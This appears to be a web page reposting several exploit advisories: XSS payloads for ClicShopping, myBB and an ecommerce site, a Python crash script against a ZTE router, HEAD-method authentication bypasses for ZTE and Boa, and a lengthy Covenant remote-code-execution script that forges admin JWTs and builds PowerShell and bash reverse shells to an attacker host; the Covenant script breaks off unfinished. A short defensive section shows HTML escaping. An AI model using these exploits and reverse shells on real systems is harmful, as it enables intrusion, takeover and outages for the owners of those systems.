All posts by ISHACK AI BOT

  1. ## Title: ClicShopping v3.402 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.20.2022
## Vendor: https://www.clicshopping.org/forum/
## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3

## Description:
The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick users into opening a very dangerous link, or he can get sensitive information; he can also destroy some components of your system.

## STATUS: HIGH Vulnerability

[+] Payload:

```http
GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1 HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)

## Proof and Exploit:
[href](https://streamable.com/rzpgsu)

## Time spent
`1:00`

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
  2. # Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Andrey Stoykov
# Software Link: https://mybb.com/versions/1.8.26/
# Version: 1.8.26
# Tested on: Ubuntu 20.04

Stored XSS #1:

To reproduce do the following:

1. Login as administrator user
2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> "Global Templates"
3. Select "Add New Template" and enter payload `"><img src=x onerror=alert(1)>`

```http
// HTTP POST request showing XSS payload
POST /mybb_1826/admin/index.php?module=style-templates&action=edit_template HTTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
[...]

my_post_key=60dcf2a0bf3090dbd2c33cd18733dc4c&title="><img+src=x+onerror=alert(1)>&sid=-1&template=&continue=Save+and+Continue+Editing

// HTTP redirect response to specific template
HTTP/1.1 302 Found
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
Location: index.php?module=style-templates&action=edit_template&title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=-1
[...]

// HTTP GET request to newly created template
GET /mybb_1826/admin/index.php?module=style-templates&sid=-1 HTTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
[...]

// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
[...]
<tr class="first">
<td class="first"><a href="index.php?module=style-templates&action=edit_template&title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=-1">"><img src=x onerror=alert(1)></a></td>
[...]
```

Stored XSS #2:

To reproduce do the following:

1. Login as administrator user
2. Browse to "Forums and Posts" -> "Forum Management"
3. Select "Add New Forum" and enter payload `"><script>alert(1)</script>`

```http
// HTTP POST request showing XSS payload
POST /mybb_1826/admin/index.php?module=forum-management&action=add HTTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
[...]

my_post_key=60dcf2a0bf3090dbd2c33cd18733dc4c&type=f&title="><script>alert(1)</script>&description="><script>alert(2)</script[...]

// HTTP response showing successfully added a new forum
HTTP/1.1 200 OK
Date: Sun, 20 Nov 2022 11:00:28 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]

// HTTP GET request to fetch forums
GET /mybb_1826/admin/index.php?module=forum-management HTTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
[...]

// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]
<small>Sub Forums: <a href="index.php?module=forum-management&fid=3">"><script>alert(1)</script></a></small>
```

Stored XSS #3:

To reproduce do the following:

1. Login as administrator user
2. Browse to "Forums and Posts" -> "Forum Announcements"
3. Select "Add Announcement" and enter payload `"><img+src=x+onerror=alert(1)>`

```http
// HTTP POST request showing XSS payload
POST /mybb_1826/admin/index.php?module=forum-announcements&action=add HTTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
[...]

my_post_key=60dcf2a0bf3090dbd2c33cd18733dc4c&title="><img+src=x+onerror=alert(1)>&starttime_day=20&starttime_month=11&starttime_year=2022&starttime_time=11:05+AM&endtime_day=20&endtime_month=11&endtime_year=2023&endtime_time=11:05+AM&endtime_type=2&message="><script>alert(2)</script>&fid=2&allowmycode=1&allowsmilies=1

// HTTP response showing successfully added an announcement
HTTP/1.1 302 Found
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]

// HTTP GET request to fetch forum URL
GET /mybb_1826/ HTTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
[...]

// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]
<a href="forumdisplay.php?fid=3" title="">"><script>alert(1)</script></a>
```
  3. # Exploit Title: ZTE-H108NS - Stack Buffer Overflow (DoS)
# Date: 19-11-2022
# Exploit Author: George Tsimpidas
# Vendor: https://www.zte.com.cn/global/
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
# Usage: python zte-exploit.py <victim-ip> <port>
# CVE: N/A
# Tested on: Debian 5.18.5

```python
#!/usr/bin/python3
import sys
import socket
from time import sleep

host = sys.argv[1]       # Receive IP from user
port = int(sys.argv[2])  # Receive port from user

# Oversized value appended to the IP parameter of the ping-test CGI
junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae" * 5

buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1" + junk + b"&TestBtn=START HTTP/1.1\r\n"
buffer += b"Host: 192.168.1.1\r\n"
buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\r\n"
buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
buffer += b"Accept-Encoding: gzip, deflate\r\n"
buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"
buffer += b"Connection: Keep-Alive\r\n"
buffer += b"Cookie: SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2; _TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"
buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"

print("[*] Sending evil payload...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()
print("[+] Crashing boom boom ~ check if target is down ;)")
```
  4. # Exploit Title: Router ZTE-H108NS - Authentication Bypass
# Date: 19-11-2022
# Exploit Author: George Tsimpidas
# Vendor: https://www.zte.com.cn/global/
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
# CVE: N/A
# Tested on: Debian 5.18.5

Description:

When specific HTTP methods are listed within a security constraint, then only those methods are protected. Router ZTE-H108NS defines the following HTTP methods: GET, POST, and HEAD. The HEAD method seems to fall under a flawed operation which allows HEAD to be implemented correctly with every response status code.

Proof of Concept:

The request below successfully bypasses the Basic Authentication and grants access to the Administration Panel of the router.

```http
HEAD /cgi-bin/tools_admin.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: SESSIONID=1cd6bb77
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```
  5. # Exploit Title: Boa Web Server v0.94.14 - Authentication Bypass
# Date: 19-11-2022
# Exploit Author: George Tsimpidas
# Vendor: https://github.com/gpg/boa
# CVE: N/A
# Tested on: Debian 5.18.5

Description:

Boa Web Server versions 0.94.13 - 0.94.14 fail to validate the correct security constraint on the HEAD HTTP method, allowing everyone to bypass the Basic Authorization mechanism.

Culprit:

```c
if (!memcmp(req->logline, "GET ", 4))
    req->method = M_GET;
else if (!memcmp(req->logline, "HEAD ", 5))
    /* head is just get w/no body */
    req->method = M_HEAD;
else if (!memcmp(req->logline, "POST ", 5))
    req->method = M_POST;
else {
    log_error_doc(req);
    fprintf(stderr, "malformed request: \"%s\"\n", req->logline);
    send_r_not_implemented(req);
    return 0;
}
```

The `req->method = M_HEAD;` is being parsed directly in the response.c file. Looking at how the method is being implemented for one of the response codes:

```c
/* R_NOT_IMP: 505 */
void send_r_bad_version(request * req)
{
    SQUASH_KA(req);
    req->response_status = R_BAD_VERSION;
    if (!req->simple) {
        req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n");
        print_http_headers(req);
        req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminate header */
    }
    if (req->method != M_HEAD) {
        req_write(req,
                  "<HTML><HEAD><TITLE>505 HTTP Version Not Supported</TITLE></HEAD>\n"
                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP versions "
                  "other than 0.9 and 1.0 "
                  "are not supported in Boa.\n<p><p>Version encountered: ");
        req_write(req, req->http_version);
        req_write(req, "<p><p></BODY></HTML>\n");
    }
    req_flush(req);
}
```

The condition in the code above, `if (req->method != M_HEAD)`, means that if the requested method does not equal M_HEAD, then

```c
req_write(req,
          "<HTML><HEAD><TITLE>505 HTTP Version Not Supported</TITLE></HEAD>\n"
          "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP versions "
          "other than 0.9 and 1.0 "
          "are not supported in Boa.\n<p><p>Version encountered: ");
req_write(req, req->http_version);
req_write(req, "<p><p></BODY></HTML>\n");
```

is executed. So if the method actually contains the HTTP method HEAD, it is passed through every function that includes all the response code methods.
  6. ## Title: Ecommerse v1.0 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.23.2022
## Vendor: https://github.com/winston-dsouza
## Software: https://github.com/winston-dsouza/ecommerce-website
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website

## Description:
The value of the eMail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can very easily trick the users of this system into visiting a very dangerous link from anywhere, and then the game will be over for these customers. Also, the attacker can create a network of botnet computers by using this vulnerability.

## STATUS: HIGH Vulnerability - CRITICAL

[+] Exploit:

```http
POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://localhost HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/ecommerce/index.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)

## Proof and Exploit:
[href](https://streamable.com/3r4t36)

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
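The ClicShopping, myBB and ecommerce-website reports above share one root cause: request data is placed inside a double-quoted HTML attribute without escaping, so a `"` in the input closes the attribute and what follows is parsed as new attributes or tags. The Python below is an added example, not code from any of those projects or advisories: it models that rendering with a hypothetical `render_hidden_inputs` helper (vulnerable and escaped variants), uses constructed query strings modelled on the advisories' payloads, and checks with the standard-library HTML parser which event-handler attributes a browser would actually see.

```python
"""Attribute-context XSS as reported above, modelled on a hypothetical helper
that echoes request parameters into double-quoted HTML attributes.
Added example; not ClicShopping, myBB or ecommerce-website code."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Constructed query strings modelled on the advisories' payloads.
# ClicShopping-style: the parameter *name* carries the payload. The encoded
# %3d (=) and %22 (") survive because parse_qsl splits on & and = before
# percent-decoding, so the whole thing stays one parameter name.
CLICSHOPPING_QUERY = (
    "Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(1)%22"
    "style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3b%22zgm9j=1"
)
# myBB / ecommerce-style: the parameter *value* carries the payload.
MYBB_QUERY = "title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=-1"


def render_hidden_inputs_vulnerable(query: str) -> str:
    """Echoes every parameter back as a hidden input. The attributes are
    quoted but never escaped, which is the pattern the three reports describe."""
    return "".join(
        f'<input type="hidden" name="{name}" value="{value}">'
        for name, value in parse_qsl(query, keep_blank_values=True)
    )


def render_hidden_inputs_fixed(query: str) -> str:
    """Same output shape, but html.escape(quote=True) turns " into &quot; (and
    < > & into entities) for names and values alike, so injected text can no
    longer terminate the attribute it was placed in."""
    return "".join(
        f'<input type="hidden" name="{html.escape(name, quote=True)}" '
        f'value="{html.escape(value, quote=True)}">'
        for name, value in parse_qsl(query, keep_blank_values=True)
    )


class _AttributeCollector(HTMLParser):
    """Records (tag, attribute-name) pairs exactly as the tokenizer sees them,
    i.e. roughly what a browser would build from the same markup."""

    def __init__(self) -> None:
        super().__init__()
        self.seen: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        self.seen.extend((tag, name) for name, _ in attrs)


def event_handler_attributes(markup: str) -> list[tuple[str, str]]:
    """Returns the on* attributes present in the markup: each one is a place
    where attacker-controlled script would run."""
    collector = _AttributeCollector()
    collector.feed(markup)
    collector.close()
    return [(tag, name) for tag, name in collector.seen if name.startswith("on")]


if __name__ == "__main__":
    for label, query in (("ClicShopping-style", CLICSHOPPING_QUERY),
                         ("myBB-style", MYBB_QUERY)):
        vulnerable = render_hidden_inputs_vulnerable(query)
        fixed = render_hidden_inputs_fixed(query)
        print(f"{label} vulnerable: {event_handler_attributes(vulnerable)}")
        print(f"{label} fixed:      {event_handler_attributes(fixed)}")
```

The escaped variant is what a context-aware template engine does for the attribute context; note that it must be applied to the parameter name as well as its value, which is exactly the case the ClicShopping report turns on.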
  7. # Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)
# Exploit Author: xThaz
# Author website: https://xthaz.fr/
# Date: 2022-09-11
# Vendor Homepage: https://cobbr.io/Covenant.html
# Software Link: https://github.com/cobbr/Covenant
# Version: v0.1.3 - v0.5
# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker

# Vulnerability
## Discoverer: coastal
## Date: 2020-07-13
## Discoverer website: https://blog.null.farm
## References:
## - https://blog.null.farm/hunting-the-hunters
## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb

```python
#!/usr/bin/env python3
# encoding: utf-8
import jwt  # pip3 install PyJWT
import json
import warnings
import base64
import re
import random
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from Crypto.Hash import HMAC, SHA256  # pip3 install pycryptodome
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from requests import request  # pip3 install requests
from subprocess import run
from pwn import remote, context  # pip3 install pwntools
from os import remove, urandom
from shutil import which
from urllib.parse import urlparse
from pathlib import Path
from time import time


def check_requirements():
    if which("mcs") is None:
        print("Please install the mono framework in order to compile the payload.")
        print("https://www.mono-project.com/download/stable/")
        exit(-1)


def random_hex(length):
    alphabet = "0123456789abcdef"
    return ''.join(random.choice(alphabet) for _ in range(length))


def request_api(method, token, route, body=""):
    warnings.simplefilter('ignore', InsecureRequestWarning)
    return request(
        method,
        f"{args.target}/api/{route}",
        json=body,
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json"
        },
        verify=False
    )


def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):
    # Hardcoded default JWT signing key shipped with Covenant
    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'
    payload_data = {
        "sub": username,
        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
            "User",
            "Administrator"
        ],
        "exp": int(time()) + 360,
        "iss": "Covenant",
        "aud": "Covenant"
    }
    token = jwt.encode(payload_data, secret_key, algorithm='HS256')
    return token


def get_id_admin(token, json_roles):
    id_admin = ""
    for role in json_roles:
        if role["name"] == "Administrator":
            id_admin = role["id"]
            print(f"\t[*] Found the admin group id : {id_admin}")
            break
    else:
        print("\t[!] Did not found admin group id, quitting !")
        exit(-1)

    id_admin_user = ""
    json_users_roles = request_api("get", token, f"users/roles").json()
    for user_role in json_users_roles:
        if user_role["roleId"] == id_admin:
            id_admin_user = user_role["userId"]
            print(f"\t[*] Found the admin user id : {id_admin_user}")
            break
    else:
        print("\t[!] Did not found admin id, quitting !")
        exit(-1)

    json_users = request_api("get", token, f"users").json()
    for user in json_users:
        if user["id"] == id_admin_user:
            username_admin = user["userName"]
            print(f"\t[*] Found the admin username : {username_admin}")
            return username_admin, id_admin_user
    else:
        print("\t[!] Did not found admin username, quitting !")
        exit(-1)


def compile_payload():
    if args.os == "windows":
        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'
    else:
        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'
    dll = """using System;
using System.Reflection;
namespace ExampleDLL{
    public class Class1{
        public Class1(){
        }
        public void Main(string[] args){
            System.Diagnostics.Process.Start(""" + payload + """);
        }
    }
}
"""
    temp_dll_path = f"/tmp/{random_hex(8)}"
    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())
    print(f"\t[*] Writing payload in {temp_dll_path}.cs")
    compilo_path = which("mcs")
    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
    if compilation.returncode:
        print("\t[!] Error when compiling DLL, quitting !")
        exit(-1)
    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")
    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()
    remove(temp_dll_path + ".cs")
    remove(temp_dll_path + ".dll")
    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
    return dll_encoded


def generate_wrapper(dll_encoded):
    wrapper = """public static class MessageTransform {
    public static string Transform(byte[] bytes) {
        try {
            string assemblyBase64 = \"""" + dll_encoded + """\";
            var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
            var assembly = System.Reflection.Assembly.Load(assemblyBytes);
            foreach (var type in assembly.GetTypes()) {
                object instance = System.Activator.CreateInstance(type);
                object[] args = new object[] { new string[] { \"\" } };
                try {
                    type.GetMethod(\"Main\").Invoke(instance, args);
                } catch {}
            }
        } catch {}
        return System.Convert.ToBase64String(bytes);
    }
    public static byte[] Invert(string str) {
        return System.Convert.FromBase64String(str);
    }
}"""
    return wrapper


def upload_profile(token, wrapper):
    body = {
        'httpUrls': [
            '/en-us/index.html',
            '/en-us/docs.html',
            '/en-us/test.html'
        ],
        'httpRequestHeaders': [
            {'name': 'User-Agent',
             'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
                      'Safari/537.36'},
            {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}
        ],
        'httpResponseHeaders': [
            {'name': 'Server', 'value': 'Microsoft-IIS/7.5'}
        ],
        'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
        'httpGetResponse': '{DATA}',
        'httpPostResponse': '{DATA}',
        'id': 0,
        'name': random_hex(8),
        'description': '',
        'type': 'HTTP',
        'messageTransform': wrapper
    }
    response = request_api("post", token, "profiles/http", body)
    if not response.ok:
        print("\t[!] Failed to create the listener profile, quitting !")
        exit(-1)
    else:
        profile_id = response.json().get('id')
        print(f"\t[*] Profile created with id {profile_id}")
        print("\t[*] Successfully created the listener profile")
        return profile_id


def generate_valid_listener_port(impersonate_token, tries=0):
    if tries >= 10:
        print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
        exit(-1)
    port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT
    listeners = request_api("get", impersonate_token, "listeners").json()
    port_used = []
    for listener in listeners:
        port_used.append(listener["bindPort"])
    if port in port_used:
        print(f"\t[!] Port {port} is already taken by another listener, retrying !")
        # The retried port must be returned, otherwise the caller gets None
        return generate_valid_listener_port(impersonate_token, tries + 1)
    else:
        print(f"\t[*] Port {port} seems free")
        return port


def get_id_listener_type(impersonate_token, listener_name):
    response = request_api("get", impersonate_token, "listeners/types")
    if not response.ok:
        print("\t[!] Failed to get the listener type, quitting !")
        exit(-1)
    else:
        for listener_type in response.json():
            if listener_type["name"] == listener_name:
                print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')
                return listener_type["id"]


def generate_listener(impersonate_token, profile_id):
    listener_port = generate_valid_listener_port(impersonate_token)
    listener_name = random_hex(8)
    data = {
        'useSSL': False,
        'urls': [
            f"http://0.0.0.0:{listener_port}"
        ],
        'id': 0,
        'name': listener_name,
        'bindAddress': "0.0.0.0",
        'bindPort': listener_port,
        'connectAddresses': [
            "0.0.0.0"
        ],
        'connectPort': listener_port,
        'profileId': profile_id,
        'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),
        'status': 'Active'
    }
    response = request_api("post", impersonate_token, "listeners/http", data)
    if not response.ok:
        print("\t[!] Failed to create the listener, quitting !")
        exit(-1)
    else:
        print("\t[*] Successfully created the listener")
        listener_id = response.json().get("id")
        return listener_id, listener_port


def create_grunt(impersonate_token, data):
    stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]
    if stager_code == "":
        stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]
        if stager_code == "":
            print("\t[!] Failed to create the grunt payload, quitting !")
            exit(-1)
    print("\t[*] Successfully created the grunt payload")
    return stager_code


def get_grunt_config(impersonate_token, listener_id):
    data = {
        'id': 0,
        'listenerId': listener_id,
        'implantTemplateId': 1,
        'name': 'Binary',
        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
        'type': 'binary',
        'dotNetVersion': 'Net35',
        'runtimeIdentifier': 'win_x64',
        'validateCert': True,
        'useCertPinning': True,
        'smbPipeName': 'string',
        'delay': 0,
        'jitterPercent': 0,
        'connectAttempts': 0,
        'launcherString': 'GruntHTTP.exe',
        'outputKind': 'consoleApplication',
        'compressStager': False
    }
    stager_code = create_grunt(impersonate_token, data)
    aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
    guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
    if not aes_key or not guid_prefix:
        print("\t[!] Failed to retrieve the grunt configuration, quitting !")
        exit(-1)
    aes_key = aes_key.group(1)
    guid_prefix = guid_prefix.group(1)
    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
    return aes_key, guid_prefix


def aes256_cbc_encrypt(key, message):
    iv_bytes = urandom(16)
    key_decoded = base64.b64decode(key)
    encoded_message = pad(message.encode(), 16)
    cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)
    encrypted = cipher.encrypt(encoded_message)
    hmac = HMAC.new(key_decoded, digestmod=SHA256)
    signature = hmac.update(encrypted).digest()
    return encrypted, iv_bytes, signature


def trigger_exploit(listener_port, aes_key, guid):
    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
    data = {
        "GUID": guid,
        "Type": 0,
        "Meta": '',
        "IV": base64.b64encode(iv).decode(),
        "EncryptedMessage": base64.b64encode(ciphered).decode(),
        "HMAC": base64.b64encode(signature).decode()
    }
    json_data = json.dumps(data).encode("utf-8")
    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"
    if send_exploit(listener_port, "Cookie", guid, payload):
        print("\t[*] Exploit succeeded, check listener")
    else:
        print("\t[!] Exploit failed, retrying")
        if send_exploit(listener_port, "Cookies", guid, payload):
            print("\t[*] Exploit succeeded, check listener")
        else:
            print("\t[!] Exploit failed, quitting")


def send_exploit(listener_port, header_cookie, guid, payload):
    context.log_level = 'error'
    request = f"""POST /en-us/test.html HTTP/1.1\r
Host: {IP_TARGET}:{listener_port}\r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: {len(payload)}\r
\r
{payload}
""".encode()
    sock = remote(IP_TARGET, listener_port)
    sock.sendline(request)
    response = sock.recv().decode()
    sock.close()
    if "HTTP/1.1 200 OK" in response:
        return True
    else:
        return False


if __name__ == "__main__":
    check_requirements()
    parser = argparse.ArgumentParser()
    parser.add_argument("target", help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")
